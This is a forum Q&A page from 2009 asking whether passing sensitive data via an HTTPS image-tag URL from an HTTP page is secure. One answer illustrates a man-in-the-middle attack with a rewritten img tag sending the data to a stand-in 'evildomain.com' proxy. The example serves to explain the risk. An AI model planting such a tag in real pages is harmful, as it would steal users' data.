tags:

views:

198

answers:

4
Q: 

http, https & ajax bypass, maybe?

I have a server script that I need to pass data to from the browser without reloading the page (aka ajax). The data is sensitive so should be sent via https. The page however is on the http layer. Because of same domain/protocol restriction, the browser doesn't allow this.

I'm thinking of cheating the system a bit by dynamically creating image tags and call the script using the src tag such as:

<img src="https://mydomain.com/mysecurescript/&amp;data=to&amp;pass=to&amp;my=script" />

I'd like to know if this will indeed be properly encrypted.

+1  A: 

Yes and no.

The server address portion of the URL is obviously not encrypted since it is used to set up the connection.

Everything else is encrypted while being sent via HTTPS connection. But anyone viewing the source will obviously be able to see the data being posted.

Zak  2009-10-09 01:00:36
A: 

It also bears mentioning that some browsers won't display (or will warn the user before displaying) mixed mode (http vs. https) HTML pages. In some cases, this may not work because the user selects to block it.

Matthew Scharley  2009-10-09 01:10:26
+3  A: 

The problem with this is if the page itself is only HTTP, then you're susceptible to a man in the middle attack. An attacker can just modify the script in the page sent over HTTP so that it instead uses:

<img src="http://evildomain.com/evilproxyscript/&amp;data=to&amp;pass=to&amp;my=script" />

The user will be none-the-wiser. To get around this you really need to serve the page over HTTPS too - which neatly solves your other problem at the same time.

(This is exactly the same reason why login forms should be on HTTPS pages, rather than just the form action being HTTPS).

caf  2009-10-09 01:12:02
If you require SSL encryption for login, your whole site should be in https IMO. You have the facility already, you may as well use it.
Matthew Scharley  2009-10-09 01:14:49
unless performance/caching is an issue, which it often can be.
Colin Coghill  2009-10-09 02:08:51
A: 

A possible alternative to the image technique (the drawback of which, as mentioned by others, is that mixed mode content is not treated kindly by some browsers) would by aSSL.

Either method will result in encryption happening, and both are still vulnerable to man in the middle attacks.

ShZ  2009-10-09 01:19:21

related questions

Retrieving HTTP status code from loaded iframe with Javascript
How to specify an authenticated proxy for a python http connection?
Why does HttpCacheability.Private suppress ETags?
How to respond to an alternate URI in a RESTful web service
Is there a reason to use BufferedReader over InputStreamReader when reading all characters?
What would be a good, windows and iis (http) based distributed version control system
Database query representation impersonating file on Windows share?
How do I use NTLM authentication with Active Directory
Process raw HTTP request content
How would you implement FORM based authentication without a backing database?
Reading "chunked" response with HttpWebResponse
Best way to let users download a file from my website: http or ftp
How do I convert a date to a HTTP-formatted date in .Net / C#
What is the best way to upload a file via an HTTP POST with a web form?
How do I stop IIS7 dropping my cookies?
Checking FTP status codes with a PHP script.
HTTP Libraries for Emacs
Accessing post variables using Java Servlets
HTTP: Generating ETag Header
HTTP: How to know when to send a 304 Not Modified response
How do I best detect an ASP.NET expired session?
How can I make the browser see CSS and Javascript changes?
How to curl or wget a web page?
The Definitive Guide To Website Authentication
Implementation of "Remember me" in a Rails application.